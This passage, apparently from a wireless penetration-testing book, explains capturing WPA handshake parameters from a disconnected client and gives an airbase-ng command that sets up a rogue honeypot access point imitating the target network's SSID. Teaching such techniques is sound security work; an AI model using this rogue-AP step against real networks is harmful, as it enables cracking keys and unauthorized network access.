The Caffe Latte and Hirte attacks allow us to crack the WEP key in the absence of the target AP, attacking the disconnected client.
In this section, we will see that it is also possible to crack a WPA key, being in this situation.
Recall from Chapter 5, WPA/WPA2 Cracking, that to crack a WPA key, we must capture a WPA four-way handshake to retrieve all the required parameters to run the cracking process: the A-nonce, the S-nonce, the client, the AP MAC addresses, and the MIC (Message Integrity Check).
It is worth noting that it is not necessary to complete the four-way handshake, as all these parameters are exchanged in the first two packets and the AP does not need to know the preshared key, as we can see in the following diagram:
Therefore, we can set up a honeypot AP with the WPA protocol and the same SSID of the target network with the following command:
airbase-ng -c 1 -e Target_Network -F wpa -z 2 -W 1 mon0